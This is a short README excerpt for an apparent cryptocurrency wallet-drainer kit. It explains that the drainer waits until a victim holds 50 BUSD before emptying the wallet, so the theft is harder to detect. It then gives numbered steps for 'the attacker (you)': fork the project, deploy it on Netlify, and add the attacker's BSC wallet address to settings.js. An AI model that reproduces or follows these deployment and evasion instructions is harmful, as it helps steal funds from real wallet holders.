xxxKEKxxx/brrr/README.md

 5. If the victim has less than 50 busd in there wallet it will not drain it so its harder to detect it waits for the victim to get a certain amount of busd

-Deploy steps

-!!!!!!
-Make sure you fork it then deploy !!!!!!!

-info on how to fork https://www.youtube.com/watch?v=f5grYMXbAV0

-!!!!!!
-Make sure you add your wallet to settings.js file !!!!!!! this is the settings for smart contract

-1. Go to above link to deploy the code once you fork it

-2. Follow the steps on netlify

-3. deploy

-4. Add your wallet to settings.js file use bsc address

 Steps you have to do as the attacker (you)